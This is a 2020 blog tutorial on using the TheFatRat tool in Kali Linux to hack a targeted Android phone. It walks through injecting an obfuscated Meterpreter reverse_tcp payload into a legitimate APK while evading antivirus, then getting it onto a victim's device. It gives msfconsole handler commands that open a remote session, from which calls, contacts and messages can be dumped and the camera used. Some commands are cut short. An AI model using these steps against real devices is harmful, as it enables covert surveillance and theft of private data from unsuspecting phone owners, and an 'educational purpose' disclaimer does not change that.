Thursday, August 13, 2020

Android Rat – TheFatRat to Hack and Gain access to Targeted Android Phone

Kali Linux Tutorial

In this Kali Linux Tutorial, we show you how to use TheFatRat. It is a simple tool to build a backdoor and post exploitation attacks like browser attack. This tool produces a malware with mainstream payload and afterward, the perfectly crafted malware will be executed on Windows, Android, Macintosh.

Malware that generated through TheFatRat has the ability to bypass Antivirus. By bypassing AV & Firewalls allows attackers to gain a Meterpreter session.

Automating Metasploit functions

  • Create backdoor for Windows, Linux, Mac, and Android
  • Bypass antivirus backdoor
  • Checks for Metasploit service and starts if not present
  • Easily craft meterpreter reverse_tcp payloads for Windows, Linux, Android and Mac and another
  • Start multiple meterpreter reverse_tcp listeners
  • Fast Search in searchsploit
  • Bypass AV
  • File pumper
  • Create backdoor with another technique
  • Autorun script for listeners ( easy to use )

Gaining access to Targeted Android Phone – Kali Linux Tutorial

You can download TheFatRat from Github 

git clone

Once this command executed it would clone and stored under TheFatRat.

cd TheFatRat

Then we need to provide execute permission and run

chmod +x && ./

Installation would take 10 to 15 minutes, during the process it checks for missing components if anything missing it will automatically download and install it.

Also Read Bypass an Anti Virus Detection with Encrypted Payloads using VENOM Tool

Once installation completed you will be provided with the list of options to create a payload.

Kali Linux Tutorial

In this Kali Linux Tutorial, we go on backdooring with original APK file like, so we need to select option 5 here.

In the mean, we should have download any popular Android application file APK and then need to enter the path of the file.

Once it has done all we need to select the Meterpreter to use, here we have selected reverse_tcp.

Kali Linux Tutorial

And then you need to select the tool to be used in APK creation.







APK build in process, it decompiles the original APK to insert payloads and then recompile the application. It uses obfuscation methods to include payloads also it appends a digital signature.

Once you have the payload created with original APK file you can move to mobile phones through File transfer or any other ways.

Then we need to setup me meterpreter session through msfconsole.

use multi/handler
set payload android/meterpreter/reverse_tcp
set lhost (your ip)
set lport (same port provided before)

Kali Linux Tutorial

Once the application installed, you will get the meterpreter session and complete control over the device.

By typing ‘help‘ you can find all the possible commands to execute.

You can dump calls, contacts, messages and even you can snaps with the mobile remotely.

Kali Linux Tutorial

Credit to TheFatRat Authors team for building such an Awesome and easy to implement tool.

Also Read Exploit Windows Remote PC with EternalBlue & DoublePulsar Exploit through Metasploit


This article is only for an Educational purpose. Any actions and or activities related to the material contained within this Website is solely your responsibility.The misuse of the information in this website can result in criminal charges brought against the persons in question. The authors and  will not be held responsible in the event any criminal charges be brought against any individuals misusing the information in this website to break the law.

Leave a Reply